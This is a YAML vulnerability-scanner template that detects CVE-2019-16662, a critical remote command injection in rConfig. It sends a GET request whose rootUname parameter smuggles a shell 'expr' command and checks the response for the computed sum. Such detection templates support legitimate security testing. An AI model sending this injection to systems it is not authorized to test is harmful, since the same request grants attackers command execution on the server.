name: poc-yaml-rconfig-ajaxserversettingschk-cve-2019-16662-rce
binding: 8ccca4f3-72c0-45b6-862a-a7f6e0962fad
manual: true
detail:
    author: corp0ra1
    links:
        - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662
    vulnerability:
        id: CT-92001
        level: critical
transport: http
set:
    rand1: randomInt(200000000, 210000000)
    rand2: randomInt(200000000, 210000000)
rules:
    r1:
        request:
            cache: true
            method: GET
            path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{rand1}}%20%2B%20{{rand2}}%20%20%3B
        expression: |
            response.status == 200 && response.body.bcontains(bytes(string(rand1 + rand2)))
expression: r1()
